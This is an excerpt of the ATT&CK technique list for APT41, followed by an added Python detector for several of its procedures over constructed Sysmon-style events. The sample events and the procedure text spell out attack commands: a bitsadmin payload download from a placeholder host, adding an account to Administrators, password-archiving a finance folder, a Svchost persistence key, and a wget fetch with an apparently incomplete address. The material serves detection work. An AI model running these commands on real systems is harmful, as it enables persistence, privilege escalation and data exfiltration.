APT41 (ATT&CK Enterprise group page excerpt): Techniques Used

Techniques attributed to the group on the page:
- Application Layer Protocol: Web Protocols
- Archive Collected Data: Archive via Custom Method
- Command and Scripting Interpreter: JavaScript
- Command and Scripting Interpreter: Windows Command Shell
- Data Obfuscation: Protocol Impersonation
- Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
- Masquerading: Masquerade Task or Service
- Masquerading: Match Legitimate Name or Location
- Obfuscated Files or Information: Software Packing
- OS Credential Dumping: Security Account Manager

Procedure examples (technique name on the page, where given, followed by the procedure):

Application Layer Protocol: File Transfer Protocols
  APT41 used exploit payloads that initiate download via FTP.

Application Layer Protocol: Web Protocols
  APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits.
  During C0017, APT41 ran wget 44:8080/kernel to download malicious payloads.

Archive Collected Data: Archive via Custom Method
  During C0017, APT41 hex-encoded PII data prior to exfiltration.

Archive Collected Data: Archive via Utility
  APT41 created a RAR archive of targeted files for exfiltration.

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  APT41 created and modified startup files for persistence.

Further procedures listed on the page:
- APT41 performed password brute-force attacks on the local admin account.
- APT41 added a registry key under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost to establish persistence for Cobalt Strike.
- APT41 used BITSAdmin to download and install payloads.
- APT41 has added user accounts to the User and Admin groups.
- During C0017, APT41 used a ConfuserEx-obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local NT AUTHORITY\SYSTEM privilege escalation.
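Several of the procedures above leave host telemetry that is easy to match on: a value written under the Svchost registry key or a Run key, bitsadmin.exe fetching a file, net.exe adding an account to a local group, and rar.exe packing files. The block below is an added detection example written for this page; it is not code from the ATT&CK page or from MITRE. The "EventID=.. key="value"" line format, the field names, the alert labels and every sample event are assumptions made for the illustration (constructed Sysmon-style records, not captured telemetry).

```python
"""
Added example, not code from the ATT&CK page or from MITRE: simple
detection logic for several of the APT41 procedures listed above, run over
constructed Sysmon-style event lines. The 'EventID=.. key="value"' line
format, the field names and every sample event are assumptions made for
this illustration, not captured telemetry.
"""
import re
from dataclasses import dataclass

# Matches key="quoted value" or key=bareword pairs in one event line.
FIELD_RE = re.compile(r'(\w+)="([^"]*)"|(\w+)=(\S+)')

# Registry locations named in the APT41 procedures above.
SVCHOST_KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost"
RUN_KEYS = (r"\Microsoft\Windows\CurrentVersion\Run",)   # RunOnce shares this prefix
# Local groups the page says APT41 added accounts to (names as net.exe takes them).
WATCHED_GROUPS = ("administrators", "users")


@dataclass(frozen=True)
class Alert:
    technique: str   # label for the matched APT41 procedure
    reason: str      # what in the event triggered the match
    evidence: str    # the field value that matched


def parse_event(line: str) -> dict:
    """Parse one constructed event line into a {field: value} dict."""
    fields = {}
    for m in FIELD_RE.finditer(line):
        key = m.group(1) or m.group(3)
        fields[key] = m.group(2) if m.group(2) is not None else m.group(4)
    return fields


def detect(event: dict) -> list:
    """Return the alerts raised by a single parsed event (possibly none)."""
    alerts = []
    eid = event.get("EventID")
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    target = event.get("TargetObject", "")

    if eid == "13":  # Sysmon RegistryEvent: value set
        if target.lower().startswith(SVCHOST_KEY.lower()):
            alerts.append(Alert("Svchost registry key (Cobalt Strike persistence)",
                                f"value written under Svchost key by {image}", target))
        elif any(k.lower() in target.lower() for k in RUN_KEYS):
            alerts.append(Alert("Registry Run Keys / Startup Folder",
                                f"Run key modified by {image}", target))

    elif eid == "1":  # Sysmon ProcessCreate
        if image.endswith("\\bitsadmin.exe") and re.search(r"/(transfer|addfile|download)\b", cmd, re.I):
            alerts.append(Alert("BITSAdmin download",
                                "bitsadmin.exe used to fetch a file", cmd))
        m = re.match(r"\s*(?:.*\\)?net1?(?:\.exe)?\s+localgroup\s+(\S+)\s+(\S+)\s+/add\b", cmd, re.I)
        if m and m.group(1).lower() in WATCHED_GROUPS:
            alerts.append(Alert("Account added to User/Admin group",
                                f"{m.group(2)} added to local group {m.group(1)}", cmd))
        if image.endswith("\\rar.exe") and re.search(r"(?:^|\s)a\s", cmd):
            alerts.append(Alert("Archive via Utility (RAR)",
                                "rar.exe invoked with the 'a' (add to archive) command", cmd))
    return alerts


def scan(lines) -> list:
    """Run detect() over every line and collect the alerts in order."""
    return [a for line in lines for a in detect(parse_event(line))]


# Constructed sample events (not real telemetry); the second and last are benign.
EVENTS = [
    'EventID=13 Image="C:\\Windows\\System32\\reg.exe" TargetObject="HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\\netsvcs" Details="wlansvc,updsvc"',
    'EventID=13 Image="C:\\Program Files\\Vendor\\setup.exe" TargetObject="HKLM\\SOFTWARE\\Vendor\\Settings\\Installed" Details="1"',
    'EventID=13 Image="C:\\Users\\Public\\update.exe" TargetObject="HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater" Details="C:\\Users\\Public\\update.exe"',
    'EventID=1 Image="C:\\Windows\\System32\\bitsadmin.exe" CommandLine="bitsadmin /transfer job /download /priority high http://example.invalid/k C:\\Users\\Public\\k.exe"',
    'EventID=1 Image="C:\\Windows\\System32\\net.exe" CommandLine="net localgroup Administrators svc_backup /add"',
    'EventID=1 Image="C:\\Tools\\rar.exe" CommandLine="rar.exe a -hpS3cret C:\\Users\\Public\\out.rar C:\\Finance"',
    'EventID=1 Image="C:\\Windows\\System32\\net.exe" CommandLine="net user"',
]

if __name__ == "__main__":
    for alert in scan(EVENTS):
        print(f"[{alert.technique}] {alert.reason}: {alert.evidence}")
```

The Svchost rule is deliberately a prefix match on the whole key rather than on one service-group value, because a new group name under that key is exactly what a hijack of the svchost service-group mechanism looks like; expect installer and patch activity to touch the Run keys, so that rule is a triage signal rather than a standalone alert.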